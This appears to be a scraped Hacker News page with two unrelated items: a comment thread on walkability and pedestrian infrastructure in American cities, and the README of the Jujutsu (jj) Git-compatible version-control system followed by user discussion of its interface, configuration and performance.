That's because you live in a car centric place. In a well designed city, a car is optional. I recommend watching Not Just Bikes videos on the subject: https://www.youtube.com/@NotJustBikes/videos
The thing is we (as an American society) really don't want a shift to walking. We like the idea of walking more but won't actually do it. Instead we'll make up a million excuses about why we just can't walk.
I say this as someone who at 40 years old has never learned to drive and who has walked/bicycled/taken the bus virtually everywhere I've needed to go. And I've lived in very rural and very suburban areas, as well as mid-size and bigger cities.
I know it's possible. It's just that the vast majority of people don't want to do it. And if you show them it can be done they'll just make up a new excuse and keep on driving.
Can you explain this to me?
For example, my local supermarket is a 8 minute walk from my house. Driving there would take about 5 minutes, due to one way streets etc, so including the hassle of parking etc it takes about as long. Driving there seems positively insane to me, except if I'm shopping for a party or something and need to fill the trunk. Are you saying that Americans would choose the car here? Or that in America it's a 5 minute drive vs a 25 minute walk?
Cause tbh in the latter case I'd pick the car too, despite my Dutch habits.*
I guess what I'm trying to ask is, are you sure it's American psyche and not, mostly, the town layout as this article suggests?
*) okok I'm Dutch so I'd bike but I kept that out to stick with the wall vs car topic
> I say this as someone who at 40 years old has never learned to drive and who has walked/bicycled/taken the bus virtually everywhere I've needed to go.
I say this with no mockery or disrespect, just description . . . you are not normal. I mean in a statistical sense. Not only are you part of (maybe the last) generation who salivated over the thought of getting a driver's license at 16 and getting away from Mom and Dad, for the vast majority of Americans, this is a totally unrealistic ask for day-to-day life. Either because of urban design or else living somewhere rural enough where it's infeasible.
Urban solutions do not always work across a country as vast, huge, and diverse as the US.
American cities, with a tiny number of exceptions, are not built for walking and biking. When neighborhoods, businesses, and infrastructure are built, their design is fundamentally based on the assumption that the users of it will have a personal motor vehicle.
We're talking about what it would take to induce behavioral change on a societal level. I don't mean to be rude, but when someone comes into a discussion like this and says 'well actually, if everyone lived like me it would be fine. Everyone else is just too lazy', it's essentially a non-sequitur and comes off as you trying to hold yourself in some kind of position of moral superiority.
You're 40 years old, so I expect you to know this already, but I'll let you in on a little secret: you cannot rely on other people to the right thing on a mass scale. You can, however, rely on them doing the easy/comfortable thing.
The challenge in sustainability is to align the good with the comfortable as much as possible.
It is commendable that you've managed to live car-free so long in such a car-centric country, but we cannot rely on all 340 million people living their lives like you have.
I live in the US, and have spent time in something like half a dozen European countries, and I can tell you that there's a clear reason why Europeans walk & bike more, and it's not because 'Americans are too lazy not to drive' or something like that.
> We like the idea of walking more but won't actually do it.
Wrong.
The reason people don't walk is simply because walking mostly really sucks in like 95% of urban or suburban contexts in the states. Even crossing the street once can be a huge pain in the ass sometimes (e.g. strip mall to strip mall across two giant parking lots and an enormous stroad).
It is astoundingly rare to find an actual nice, not-tiny area to walk in, in terms of urban design and points of interest. To a lot of Americans, 'has sidewalks' means an area is walkable, which is just...so, so very wrong.
I lived in Germany for five years, and during our annual summer trip back to the states, it was always so sad to see the pathetic state of walking and biking infrastructure everywhere we went. It's like we're not even trying...because, well, we're not. Walking here sucks because we choose to make it suck.
I've seen people lose their jobs because they weren't willing to walk a half mile. No car, but taking Uber for that trip. It turns out, Uber is not reliable transportation. But walking usually is.
This has not been my experience. I'm lucky to live in a very walkable part of a very walkable city, and almost every time someone comes to visit I find they've disappeared within 24 hours to 'explore the area'.
These are people who virtually never walk anywhere unless they have to, but you put them in the right environment and they almost can't help it.
How do you get toddlers to daycare, preteens to soccer practice, etc.
I don't like the word dignity for this. I think a clearer term would be priority.
We want to encourage people to be pedestrians so pedestrians should have priority over cars. In some countries, pressing a walk button actually triggers the stoplight to cycle to yellow then red for cars. Why not implement that more frequently? Also favor putting cars/roadways through tunnels rather than pedestrians. Surface can be nice parks.
Priority is a ceiling which can shift; see the history of public transit in LA, before car companies destroyed it.
Dignity is a floor; it is very difficult to lower a floor.
I liked lots of this, but I really disagree with the night shot. What about the dignity of the people living along the bright (overly) lighted sidewalk, who lose their dark skies and dark bedrooms?
Street lights suck, and should be absolutely minimized, and turned off at 22h. If you feel intimidated by the dark, you can solve that for yourself: don't shine your fears into my windows.
There is actually a simple solution, which is to put red lights on street lamps instead of white lights. You can buy LEDs which emit only in frequencies that won't disturb circadian rhythms.
They are a bit more expensive, but I think the reason we don't do this is because planners/governments are probably unaware of the problematic nature of light pollution.
It's as easy as bending and cutting some sheet metal into shrouds so the light doesn't enter residential windows.
My place has this problem and I'm not sure why it does. The solution seems so cheap and obvious to me. Just shape the shroud so the beam only shines downward.
I'm confused by this sentiment. It's possible to illuminate the sidewalk without shining in through people's windows (or cause excess light pollution, for that matter), especially if the sidewalk is the only thing you need to illuminate and the lamps can be built lower. It's also not unjustified fear. The risk of being subjected to violent crime such as robbery, assault or rape is higher when there is no illumination.
Recently I've seen that in our city new street lights on minor roads near buildings usually have a special form and lower height specifically to counter this problem
excuse me, what? No, if I need to walk through late at night, I want to be safe. You have some options: - put the bedrooms away from the street - invest in some curtains - live somewhere more pastoral???
Agreed. I wish there were a standard practice of turning off streetlights between certain hours, to reduce light pollution.
It was over 100 degrees where I was in the Houston area. I don't want to walk anywhere. Nicer sidewalks won't change profuse sweating. All of the bike and walk crowd seems to have never been to Houston in the summer. It's 80 degrees in Cupertino right now and 96 degrees in Houston as I type this. That's a huge difference in what is comfortably walkable.
Nobody likes walking in 100 degree heat. When I lived in Europe, certainly walkable towns were awesome. Although, I do remember being on subways in Paris that didn't have air conditioning in July and it was straight up miserable to be packed into a sardine can surrounded by sweaty aromatic people, then exiting the station to be greeted by a blast furnace on the surface and then walking multiple blocks to the destination.
Taking a taxi was air conditioned comfort and a welcome luxury when I could afford it. I am not knocking Paris, but making the point that the ideology of eliminating private transport in favor of being out in the elements is a regression, not an improvement.
There should be balance when it comes to transport options. Streets can be improved, but it shouldn't be at the expense of cars entirely. Make it great for all modes of transport. A great example is when Houston ripped up driving lanes to add bike lanes — other than hobby cyclists, those lanes are rarely used unless it's on one of the six days a year that the weather is nice enough. The bike lanes made traffic worse while benefiting just a few die-hards that cycle as some sort of social protest rather than as a legitimate means of navigating this huge city.
Why not make motorcycle and motor scooter lanes instead of bike lanes? Why do people insist on trying to turn Houston into Amsterdam? Houston isn't Amsterdam. Greater Houston is 10,000 square miles with 7.5 million people. Greater Amsterdam is 1000 square miles with 2.5 million people.
Trying to make places with very hot weather "walkable" is about as logical as building a ski resort in Austin.
Barcelona is hot too but somehow it works, bc less cars and more trees(especially near sidewalks) means nicer walking even in hot summer 'Greater Houston is 10,000 square miles with 7.5 million people. Greater Amsterdam is 1000 square miles with 2.5 million people.' - yes, we know that american towns are inferior because of parking requirements and local zoning, yes the problem is more complex, but does this mean it's not a problem or ppl just should start slowly fixing it? (Like abolishing parking reqs, zoning laws and just pass a law that forces companies to build a nice sidewalk&bike lane when a street is renovated, slowly fixing the problem). We can't know for sure walkable city will not work in Huston because laws generally prohibit building one with those stupid requirements
I'm an Aussie, and after living 3 months in LA I think it was the most poorly designed city I've ever been to for this exact reason - I felt unable to walk practically anywhere!
It felt like my options were drive or taxi. And we know what LA traffic is like.
I can't speak to other US cities, and it is possible that certain areas of LA are less terrible than where I stayed. (But I will say, I was in quite an affluent area which had no business being unwalkable and without public transport).
But it really opened my eyes to how good we have it in Australian cities (which themselves are still far behind many European cities).
Santa Monica, Hollywood, Burbank, Los Feliz, Downtown, Pasadena, Long Beach, are all rather walkable.
This article kind of skips out on safety. Many of the urban areas that have the density for walking, often have issues of homelessness and open drug use that makes people feel unsafe walking, especially with children.
It must be easy to ignore a homeless population if you can just drive past them
I moved from Spain to the US, and I often find myself trying to explain to people back home just how miserable and even humiliating the pedestrian experience is here.
Here are some other examples of things that I think contribute to the hostile walking experience in the US:
* Cars parked in short driveways often extend all the way across the sidewalk. Even if you can easily step off onto the road to walk around them (not all pedestrians can), it just feels like a slap in the face to have to do that.
* Cars have much higher and stronger headlights, with the high beams often left on, and drivers are generally much less mindful of them. As a pedestrian walking at night on under-lit streets, you are constantly getting blinded.
* Tinted windows (even the mild level of tint that most cars in the US have). The whole experience of being a lone vulnerable pedestrian among a sea of cars is made even worse when you can't see the people in the cars (but you know they can see you).
* Often the only option to get food late at night are fast food places, which become drive-thru only after a certain time. Having to go through the drive-thru on foot is obviously a terrible experience, and they will often refuse to even serve you.
Tinted windows are such a pet peeve of mine. I get it in the tropics but in most of America the individual benefits of dark tint seem like they'd be outweighed by the collective good of better visibility through cars, enabling eye contact with drivers, etc.
The SUV craze is really to blame - in general many US states don't allow dark tint on traditional cars but do on SUVs. And since rear windows on vans and light trucks (aka SUVs) are exempted from window tint restrictions, pull up to a typical intersection in the US and look around and you can't see worth a damn.
Somehow it's ok for a Subaru Crosstrek to have dark tint but not an Impreza that is the same car but lower? There are even more weird situations like the Mercedes Benz GLA compact CUV which typically has tinted windows, but not the top-of-the-line AMG trim because that one has a lowered suspension, making it a "car" instead of a "light truck".
> The whole experience of being a lone vulnerable pedestrian among a sea of cars is made even worse when you can't see the people in the cars (but you know they can see you).
It's even worse than that. You don't know they can see you, you know they could see you but you cannot know if they do see you. That's terrible for pedestrian safety.
Adding even MORE to the insult is this part from the article: 'many agencies will simply remove pedestrian facilities to reduce the cost of compliance'. I see that so often: having to cross the damn intersection three times just to continue across, and all the light timings favor cars. It's a big middle finger.
The first one doesn't seem unique to the US.
I just spent the last 2 months i Europe and on many side streets there is no place to safely stop a car which means pulling into the sidewalk is the only option. So I frequently had to step into the street to walk around a stopped delivery van or similar.
really?
Tokyo is very oriented towards pedestrian traffic, considering shinkansen and most rail service - yet satellite suburban sites, like Saitama, etc have tiny residential rows that literally don't fit both a car and a pedestrian. And that's where most people live. Yet Japan is highly pedestrian.
Now, South America. Most if not all urban centers of 1M are extremely well covered by bus networks. And they have to, since most of the population cannot afford a car. However, the moment you step off the old city centers, you are literally walking on the main road, sharing space with speeding cards and buses driving like maniacs. You will often find a major road has literally no sidewalk, only dirt, weeds and sewage.
Compared to those situations, the US is a walking paradise.
The problem of distance is very different from the problem of safety and confort in the US
'Often refuse to serve you' means that they sometimes do? I tried to go through a drive-thru on a bicycle in Czechia and they told me to fuck off.
I've never heard the experience described as "humiliating," which is incredibly surprising because just seeing that written out (and your thoughtful elaboration) made a lot of things click into place for me.
It is illegal in most places to park a car on the sidewalk. I don't know of anyone, at least the big chains, that will serve a pedestrian in a drive thru. If you live in a more walkable part of town there is usually an all night diner.
Actually, the tinted windows worry me because I don't know whether the drivers do see me. Vanishingly few drivers would deliberately run over a pedestrian, but plenty are distracted or otherwise inattentive.
just how miserable and even humiliating the pedestrian experience is here
I ended up talking to some woman yesterday who mentioned she loved to come back to Oakland because of how walkable it is compared where she is now in the central valley. I was amused at the whole exchange because while Oakland and San Francisco do a decent job, they're by no means great. Cars parked in short driveways often extend all the way across the sidewalk.
Even if you can easily step off onto the road to walk around them (not all
pedestrians can), it just feels like a slap in the face to have to do that.
One of the big things I noticed when comparing the pedestrian experience in Manhattan (and to a lesser extent the outer boroughs) to San Francisco is that New York lacks the curb cuts that encourage this kind of behavior. You spend a lot less time walking around parked cars or having to keep an eye out for someone who's in a hurry to exit 'their' driveway.In San Francisco, at least, there's a big tug of war about where your driveway ends and the curb begins. Suffice to say blocking the curb is one of those things that's almost never enforced.
Also this:
https://old.reddit.com/r/sanfrancisco/comments/155z0eo/frien...
> I often find myself trying to explain to people back home just how miserable and even humiliating the pedestrian experience is here.
Same. I've lived in Los Ángeles and Amsterdam, and it is impossible to explain to my friends and family just how awful the quality of life is in LA precisely because of the difference in attitudes and priorities over cars. Perhaps some have "nicer" (aka bigger) houses in LA than they would have in Ámsterdam, but once they leave their front door everything is objectively worse
People in this thread are really talking past each other. I've been to the nice Asian mega cities with great and clean subways and buses. And I've lived in the American suburbs. You can't make the American suburbs like the mega cities by just making them walkable.
Everything in a mega city works together to make transit work. Those tall buildings? They provide great shade no matter how sunny it is which is critical for walking to bus stops and subway stations. Also, the walk itself is so much more interesting, random stores to stop at and places to eat and go to. Density makes transit work.
You can't just put random stores in a suburb and make it 'walkable' and expect the same thing. Just as everything in a mega city works together to make transit work, everything in a suburb works together to make cars work.
We need to give up on the mass transit solutions that work for dense cities (subways and buses) for suburbs. It's a waste of money and completely the wrong solution. It hasn't worked for decades and never will.
Shut down bus systems for suburbs and use the government funds to give out ride sharing (either Uber or government run) credits for everyone to use (low income can get more credits). That's what a suburb is designed for, point-to-point travel such as cars. And invest massively in real protected, useful bike lanes and stop trying to kill e-bikes with regulations (which a lot of cities are trying to do). e-bikes are finally a real alternative to cars in suburbs, it has just the right amount of travel speed and ease to challenge the car, but it's already under attack. Ride sharing credits and e-bikes, these are the solutions for suburbs. Stop trying to fit a square peg (buses and subways) into a round hole.
Well, TBH in Europe you usually don't have an option to get food late at night :)
This lens is underutilized in the discourse, but people feel it acutely. Even a lot of the anti-cycling stance comes down to, "What am I, poor?" When you are using transportation infrastructure that's designed with contempt for you, you know, and you don't want to be there. See also: rail slow zones, buses that shimmy and rattle violently on imperfect pavement, how Muni trains close their doors and pull one foot out of the station just to wait at a red light. If you've never seen good, dignified implementation of walking and transit then a lot of this seems inherent & car culture seems synonymous with dignity. Short of tickets to Amsterdam for everyone, I don't know how to fix it.
> Even a lot of the anti-cycling stance comes down to, "What am I, poor?"
Or this tired bit of 'wit': 'Oh, you're biking? Let me guess, DUI?'
'Muni trains close their doors and pull one foot out of the station just to wait at a red light'
What is the reason for this? I see it all the time in metro areas, and it always blows my mind that traffic lights aren't synced with the tram schedules.
> how Muni trains close their doors and pull one foot out of the station just to wait at a red light
There are safety and scheduling reasons for this. They are not merely trying to snub riders. For example, the light rail trains here have a standard for how long they open their doors at each station. It's something like 14 seconds. A vehicle with open doors will also allow passengers to disembark; it's a two-way passage. So should they sit in the station with closed doors, or push off a few yards down to the intersection? Now, other motorists see a train stopped at a station and they think one thing. They see a train stopped and waiting for a red light and they know that it will proceed through on green. It seems weird to imagine a train that lingers at the station as if it's boarding but it's not, it's really waiting for the light to change, and then it will pounce on the opportunity. That's less than predictable behavior, as far as other motorists are concerned.
Our transit authority reminds riders to arrive at the stop 5 minutes early. We're also reminded that if we miss this one, another one is on the way. Passengers need not inherit that toxic road rage.
> Even a lot of the anti-cycling stance comes down to, "What am I, poor?" When you are using transportation infrastructure that's designed with contempt for you, you know, and you don't want to be there.
I grew up in close contact with a large urban poor population and I think the view of bikes was the exact opposite of this. Biking in the city is considered the purview of affluent white people
I have a pretty strong anti-cycling stance, because I watched my New York neighborhood that was a pedestrian paradise significantly degraded by bike lanes. The balance of walking, subways, busses, taxis and delivery trucks had worked pretty well. Bicyclists introduced the concept of failing to yield, then acting indignant and entitled.
>Even a lot of the anti-cycling stance comes down to, "What am I, poor?"
I agree with the overall point that people don't want to cycle because the experience sucks, but your description feels like an unnecessarily inflammatory way to say 'people are willing to pay for a more pleasant experience'. Nobody says 'a lot of the anti-cheap laptop stance comes down to, 'what am I, poor?'.
> Short of tickets to Amsterdam for everyone, I don't know how to fix it.
I just got back to the US from Amsterdam. I'll never look at these awful streets the same again.
> Even a lot of the anti-cycling stance comes down to, "What am I, poor?"
Maybe this will change now that bikes cost more than most used cars. Spending 15K on a bike is a thing now.
A great post. My only nitpick is that Amsterdam isn't a particularly good example of active travel in NL.
Ah, let us look at the data. In reality, only rich (and white) folks can afford to live in areas that are not car-dependent.
https://granfondodailynews.com/2020/01/17/is-north-american-...
> From 2001 to 2017 the number of people cycling increased the fastest among high income, highly educated, employed, white men between the ages 25 and 44.
The cause and effect might be reversed.
1) Most people prefer to drive... look at any country that is getting richer - people want to buy cars.
2) It is only when people cannot afford to drive or driving is too inconvenient (traffic, or narrow streets/lack of parking in Europe, or outright restrictions ), they will use alternative modes of transportation.
3) The more people are thus inconvenienced, the more public support there is for the alternative modes (simply by the numbers); moreover, an average person biking and taking transit becomes richer/nicer, so the political will to improve the experience increases even faster than the number of people; plus the experience becomes nicer even without extra investment.
It's a flywheel either way.
Now, you could argue that global warming is bad / enough freeways cannot be built / etc., sure. Maybe we cannot have nice things.
But don't argue that people want to live in urban paradise and some contrived system is simply not giving them what they want. Most people everywhere, when they can, want to drive and live in houses. Except in some places many can afford that and have the infrastructure, and in some only a few do. It's not like car ownership and traffic is that low in Europe, given how admittedly convenient it is to not have one and how relatively expensive car ownership is, esp. in relation to incomes.
It's so strange because it isn't that people are flooding into cities and bringing their car fixation with them. As a rural/suburban person, nobody I know from here drives when they're traveling in a city because the driving experience is so miserably bad compared to driving in the country. It's the city people who think moving five feet every thirty seconds and bathing in an ocean of car horn noises is somehow compatible with human life.
Every morning, I get up at 5AM, and walk 5K.
1/2 mile of it, is on the local high school running track.
That's because the neighborhood after the high school (where I would prefer to walk) is actively hostile to pedestrians. No sidewalks, no shoulders, lots of blind curves, and a ton of distracted drivers. It's dangerous as hell.
In fact, I often smell weed, when cars pass me.
At 5:30 AM.
That's a great way to get started on a productive day.
Just throwing it out there but it would be nice if there were a lot more pesestrian and bike only roads built separate from car roads. Big cities already have recreational walking trails that typically follow some sort of a drainage or sewage 'river'.
Another thing I wondered is how under most city streets there is already wiring and tunnels and some infra. Is the cost that unreasonable to convert roads one by one so that cars go underground and intersections overlap to avoid stops, then all you need is exits to parking spaces and low-speed residential streets. Cars get to go a lot faster with little stopping in cities (which will reduce freeway jams), less pedestrians die, self-driving cars would do well there too. Flooding is the main issue I can think of but given climate change, they need to make cities much more flood tolerant and making more floos tunnels/digging might be needed anyways.
In my ideal city, these roads will also have systems for small package delivery/transport and garbage disposal where people will select the type of garbage and put it in a box, upon validation they get credits for it if it gets recycle but also less package waste because the package delivery system won't need to have boxes with your address on it, it would just be the stuff, as-is. And this will work with grocery delivery and even high volume destinations like warehouses to walmarts which also require a lot of packaging and waste. Now imagine this delivery system as a subway for packages and imagine adding humans to the mix, delivering them to destinations as if they were packages and then you need a lot less cars and parking space waste. That type of transportation removes the downsides of public transportation like sharing space with a lot of people and being picked up/dropped off ar specicific points and then having to walk to the destination.
Just random ideas to put out there for anyone who reads and knows the subject better.
> Big cities already have recreational walking trails
Those are a great example of the problem. Often those recreational walking trails are very nice, but they don't go anywhere functional.
Milton Keynes tried separating pedestrians and cyclists, it is mostly considered a failure.
Reasons include- they built the place so well for cars that everybody owns a car- poorly lit underpasses- confusing layout- crime and the feeling of being alone if somebody were to attack, due to no cars passing by and no shop windows.
https://www.cycling-embassy.org.uk/blog/2012/04/27/they-buil...
https://forum.cyclinguk.org/viewtopic.php?t=46081
'You have to cycle quite a long way to get anywhere useful - Signage is appalling. If I hadn't had the map I would have got quite lost. [the cycle paths don't follow the grid system]'
Tunnels are quite dangerous, having cars at high speed for long distances is extra dangerous. Having them leave the tunnel is either a highway junction or a stroad. There is one in Boston though. https://www.youtube.com/watch?v=d5pPKfzzL54
559 points about 14 hours ago by lemper in 10000th position
github.com | Estimated reading time – 11 minutes | comments | anchor
This is not a Google product. It is an experimental version-control system (VCS). I (Martin von Zweigbergk [email protected]) started it as a hobby project in late 2019. That said, this it is now my full-time project at Google. My presentation from Git Merge 2022 has information about Google's plans. See the slides or the recording.
Jujutsu is a Git-compatible
DVCS. It combines
features from Git (data model,
speed), Mercurial (anonymous
branching, simple CLI free from 'the index',
revsets, powerful history-rewriting), and Pijul/Darcs
(first-class conflicts), with features not found in most
of them (working-copy-as-a-commit,
undo functionality, automatic rebase,
safe replication via rsync
, Dropbox, or distributed file
system).
The command-line tool is called jj
for now because it's easy to type and easy
to replace (rare in English). The project is called 'Jujutsu' because it matches
'jj'.
If you have any questions, please join us on Discord . The glossary may also be helpful.
Jujutsu has two backends. One of them is a Git backend (the other is a native one 1). This lets you use Jujutsu as an alternative interface to Git. The commits you create will look like regular Git commits. You can always switch back to Git. The Git support uses the libgit2 C library.
Almost all Jujutsu commands automatically commit the working copy. That means
that commands never fail because the working copy is dirty (no 'error: Your
local changes to the following files...'), and there is no need for git stash
.
You also get an automatic backup of the working copy whenever you run a command.
Also, because the working copy is a commit, commands work the same way on the
working-copy commit as on any other commit, so you can set the commit message
before you're done with the changes.
With Jujutsu, the working copy plays a smaller role than with Git. Commands
snapshot the working copy before they start, then the update the repo, and then
the working copy is updated (if the working-copy commit was modified). Almost
all commands (even checkout!) operate on the commits in the repo, leaving the
common functionality of snapshotting and updating of the working copy to
centralized code. For example, jj restore
(similar to git restore
) can
restore from any commit and into any commit, and jj describe
can set the
commit message of any commit (defaults to the working-copy commit).
All operations you perform in the repo are recorded, along with a snapshot of the repo state after the operation. This means that you can easily revert to an earlier repo state, or to simply undo a particular operation (which does not necessarily have to be the most recent operation).
If an operation results in conflicts, information about those conflicts will be recorded in the commit(s). The operation will succeed. You can then resolve the conflicts later. One consequence of this design is that there's no need to continue interrupted operations. Instead, you get a single workflow for resolving conflicts, regardless of which command caused them. This design also lets Jujutsu rebase merge commits correctly (unlike both Git and Mercurial).
Basic conflict resolution:
Juggling conflicts:
Whenever you modify a commit, any descendants of the old commit will be rebased onto the new commit. Thanks to the conflict design described above, that can be done even if there are conflicts. Branches pointing to rebased commits will be updated. So will the working copy if it points to a rebased commit.
Besides the usual rebase command, there's jj describe
for editing the
description (commit message) of an arbitrary commit. There's also jj diffedit
,
which lets you edit the changes in a commit without checking it out. To split
a commit into two, use jj split
. You can even move part of the changes in a
commit to any other commit using jj move
.
The tool is quite feature-complete, but some important features like (the
equivalent of) git blame
are not yet supported. There
are also several performance bugs. It's also likely that workflows and setups
different from what the core developers use are not well supported.
I (Martin von Zweigbergk) have almost exclusively used jj
to develop the
project itself since early January 2021. I haven't had to re-clone from source
(I don't think I've even had to restore from backup).
There will be changes to workflows and backward-incompatible changes to the
on-disk formats before version 1.0.0. Even the binary's name may change (i.e.
away from jj
). For any format changes, we'll try to implement transparent
upgrades (as we've done with recent changes), or provide upgrade commands or
scripts if requested.
See below for how to build from source. There are also pre-built binaries for Windows, Mac, or Linux (musl).
On most distributions, you'll need to build from source using cargo
directly.
cargo
First make sure that you have the libssl-dev
, openssl
, and pkg-config
packages installed by running something like this:
sudo apt-get install libssl-dev openssl pkg-config
Now run:
cargo install --git https://github.com/martinvonz/jj.git --locked --bin jj jj-cli
If you're on Nix OS you can use the flake for this repository.
For example, if you want to run jj
loaded from the flake, use:
nix run 'github:martinvonz/jj'
You can also add this flake url to your system input flakes. Or you can install the flake to your user profile:
nix profile install 'github:martinvonz/jj'
If you use linuxbrew, you can run:
If you use Homebrew, you can run:
You can also install jj
via MacPorts (as the jujutsu
port):
sudo port install jujutsu
You may need to run some or all of these:
xcode-select --install brew install openssl brew install pkg-config export PKG_CONFIG_PATH='$(brew --prefix)/opt/openssl@3/lib/pkgconfig'
Now run:
cargo install --git https://github.com/martinvonz/jj.git --locked --bin jj jj-cli
Run:
cargo install --git https://github.com/martinvonz/jj.git --locked --bin jj jj-cli --features vendored-openssl
You may want to configure your name and email so commits are made in your name.
Create a file at ~/.jjconfig.toml
and make it look something like
this:
$ cat ~/.jjconfig.toml [user] name = 'Martin von Zweigbergk' email = '[email protected]'
To set up command-line completion, source the output of
jj util completion --bash/--zsh/--fish
(called jj debug completion
in
jj <= 0.7.0). Exactly how to source it depends on your shell.
source <(jj util completion) # --bash is the default
Or, with jj <= 0.7.0:
source <(jj debug completion) # --bash is the default
autoload -U compinit compinit source <(jj util completion --zsh)
Or, with jj <= 0.7.0:
autoload -U compinit compinit source <(jj debug completion --zsh)
jj util completion --fish | source
Or, with jj <= 0.7.0:
jj debug completion --fish | source
source-bash $(jj util completion)
Or, with jj <= 0.7.0:
source-bash $(jj debug completion)
The best way to get started is probably to go through
the tutorial. Also see the
Git comparison, which includes a table of
jj
vs. git
commands.
There are several tools trying to solve similar problems as Jujutsu. See related work for details.
At this time, there's practically no reason to use the native backend. The backend exists mainly to make sure that it's possible to eventually add functionality that cannot easily be added to the Git backend. ↩
my initial reaction, half OT:
Ooof, random 'ASCII' (actually: Unicode) art & dev-chosen colors, my bane of the 'modern' CLI applications. That drawing you like? Doesn't work for me, give me the raw output please. Those colors you love? Aside of red-green weakness being the most dominant factor, what you're really doing is trying to set things apart, connotating color with semantics as well. It's nice this works fine on your white-on-black terminal. Have you tried this on a white-on-firebrick terminal? Yellow-on-green? Or anything else than _your_ 'normative' setup? Man ...
Also not sure the information presented is adequate. E.g. consider commit 76(2941318ee1) - jj makes it look like that was committed to that repository, while it was done to another. The git presentation looks more spot-on (for that particular commit, while the rest of the display is just a mess - ASCII art that does not add semantics, random colors); also where is 1e7d displayed in jj's output? Why is jj's order different? I remain unimpressed by both UIs.
' Create a file at ~/.jjconfig.toml' ... $XDG_CONFIG_HOME ?
When is that working copy committed? When I run jj? Why bother, when it's not working asynchronously and automatically? And if you commit working copies, do you sync under the hood with stuff the other folks you collaborate with? If not, why bother?
Oh nice, a command to fix 'stale' workspaces.. how about you don't let workspaces go stale?
This may all seem to make sense to git-minded people, given the comments here. To me, neither jj nor git make sense (as fossil-minded person who has to work with git), so shrug enjoy....
..but please fix that ASCII Art and Color Stuff, thank you very much.
I don't mind color, but pushing beyond the 16 colors is often a stretch without a very specific use case & bound to lead to a lack of legibility for some unless both foreground & background are defined—which has a tendency to look just as bad in a terminal. Similar issues happen with CSS when folks define color but not background color.
But the one CLI trend that annoys me is using Emoji terminal. I often find their colors and shapes to be too distracting, commanding too much of the visual hierarchy of output. They also have a tendency to kind of fall apart when some characters or combinations of characters are missing or they no longer line up with the monospace output. A big part of CLI output is being able to scroll through the logged output, but the Emoji actually make visual scanning more difficult.
All the colours can be adjusted or turned off entirely in the config. [1] A number of different graph styles are supported [2], and failing that, you can completely customise the output template [3]
$XDG_CONFIG_HOME/jj/config.toml is supported, that's where I keep mine.
The working copy is updated whenever you run jj by default, but watchman is also supported (recently added). [4]
In my experience, the command to fix the stale workspaces only needs to be run in exceptional cases where a bug got triggered and a command failed to complete or if you're doing manual poking around.
It's a mindset shift, but it's well worth it in my opinion.
[1] https://github.com/martinvonz/jj/blob/main/docs/config.md#ui... [2] https://github.com/martinvonz/jj/blob/main/docs/config.md#gr... [3] https://github.com/martinvonz/jj/blob/main/docs/templates.md [4] https://github.com/martinvonz/jj/blob/main/docs/config.md#fi...
Does it honor NO_COLOR?
If not, then I have https://github.com/alrs/nofun
> It's nice this works fine on your white-on-black terminal
I was curious about this as well, as I found the images in the README a bit hard to read. In fact the program itself seems to use quite sensible colours in my white-background terminal, and it also respects the NO_COLOR environment variable.
This looks really cool, I'll try it out on some of my repos to get a feel for it.
Too bad support/discussion happens entirely on Discord.
Support/discussion happens a fair amount on GitHub Discussions and Issues as well.
Realistically, Jujutsu is a pretty new project and there are many features to add and lots and lots of code that needs to be written. There is a lot of talking that needs to happen, in other words. So, most of the developers and committers actively hang out and discuss things in Discord, yes, because it's convenient, and fast, and allows all the interested parties to be alerted. I say this as someone who started hacking/working on Jujutsu recently; having Discord has been nice for such a new project.
The reality is that the project is in a part of its life where active discussion and feedback with the userbase is pretty valuable. So, you just go where the users are, and Discord is a big place for that.
GitHub Issues and GitHub Discussions are also actively used by a lot of people, and you can just post things there. Every major committer watches those venues as well, AFAIK, I know my notifications are set up for it.
Over time, assuming things are wildly successful, you'd probably have a lot of different venues to discuss things. I would view Discord mostly in the context of a new project that wants feedback, in that regard.
Does anyone have experience with large repo's of say, 100 GB? Does jj incur performance penalty's compared to native git?
It depends on whether you're talking about 100 GB repository size or working copy size.
- Currently no partial/shallow clones, so you need to materialize the entire repo on disk.
- Working copy status can take a while (see https://github.com/martinvonz/jj/issues/1841 for tracking issue). This can be ameliorated at present by configuring Watchman as a filesystem monitor, and work is underway to improve status further.
- No support for Git LFS at present (even in colocated repos). When using the Git backend with jj, you would expect the same problems with regards to large file management.
- I haven't noticed any particular performance issues when interacting with the object store a large repository. It should be approximately the same as for Git since it uses libgit2 for the Git backend.
- Faster for operations that can be done in-memory in jj but only on-disk with Git, such as various rebase operations.
The tool looks great; I have a hurdle to overcome with the name.
I'm long accustomed to spelling it, in English, as Jujitsu. I've also seen Jiu-jitsu. 'jutsu' is much less common, IME.
Is there such thing as canonical Romanisation of Nipponese? I can deal with a project being 'wrong' better than not knowing which of us is wrong.
I think your question is getting into the field of martial arts lineage. People might have their own narratives/ mythologies around this, but here's the most neutral way I can explain it: As techniques and styles evolve over the years, people come up with new names to describe those styles. Name similarities will often imply closer ties in lineage.
As a Brazilian Jiu Jitsu practitioner, I cringe when I see it spelled any other way, but also I have to recognize that I only feel that way because I have more exposure to that specific martial art/spelling.
I cringe whenever I see it spelt with an 'i.' It would 'jujutsu' or similar in either of the typical romanization schemes (Hepburn, etc). 'Ji' would be pronounced 'jee' in any of the standard romanizations.
Pronunciation is more like joo-juh-tsu. 'Tsu' is its own syllable.
There are multiple romanisation systems for Japanese, but the most common one is Hepburn. In Japan, Kunrei-shiki is sometimes used (especially by the government), which is designed with Japanese speakers in mind (vs Hepburn which was designed with English speakers in mind).
It's jujutsu in both, but there are varying ways of representing the long vowel on the first 'u' -- either omitting it (jujutsu), using a macron or circumflex (jūjutsu), or repeating the vowel (juujutsu).
Ju-jitsu and jiu-jitsu are not correct in any romanisation system that I know of, I'm not really sure how they came about. Probably historical accident.
Oh its from Google? Eh. Pass. It will either be killed in 5 years, or be pitted against Git in an attempt to take over the community.
The 'disclaimer' is quite interesting. Starts off with 'this is not a Google product' and ends it with the fact that it is indeed their full-time project at Google.
I wish these well-intentioned Googlers realise what they are doing.
Oh, and you might be interested in https://radicle.xyz/. I tried it a while ago, was stable and has nice aesthetics to it as a bonus.
I was expecting to be meh, but by halfway through the readme I was thinking 'this actually sounds great!'
Nice to see this posted here. I switched over to it about 2-3 weeks ago, and I haven't looked back. It took a lot of mental rewiring, but I really enjoy the workflow `jj` provides. There's no longer a time to think about what's being committed, because all file changes automatically amend the working copy commit. Of course, sometimes you don't want this, so you have things like the ability to split a commit into two, moving commits, etc. But having _everything_ operate on commits is really nice! Other niceities that I like:
